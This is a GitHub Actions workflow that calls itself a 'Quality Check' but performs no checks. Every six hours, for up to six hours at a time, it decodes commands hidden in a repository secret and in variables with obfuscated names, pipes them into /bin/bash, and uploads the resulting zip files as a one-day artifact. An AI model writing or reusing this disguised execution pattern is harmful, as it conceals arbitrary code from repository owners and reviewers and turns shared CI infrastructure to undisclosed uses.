name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '24 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          csb6083: ${{ secrets.csb6083 }}
        run: |
          printf '%s' "$csb6083" | jq -r .clb66 | /bin/bash
          echo $v07 | jq -r .jfni1 | /bin/bash
          printf '%s' "$ylwr26370" | jq -r .dounc75391 | /bin/bash
          echo $h57264 | jq -r .ksg1682 | /bin/bash
          echo $sw8711 | jq -r .ehpw1 | /bin/bash
          printf '%s' "$m4681" | jq -r .lgvl72539 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: KINqZcJs
          path: "*.zip"
          retention-days: 1
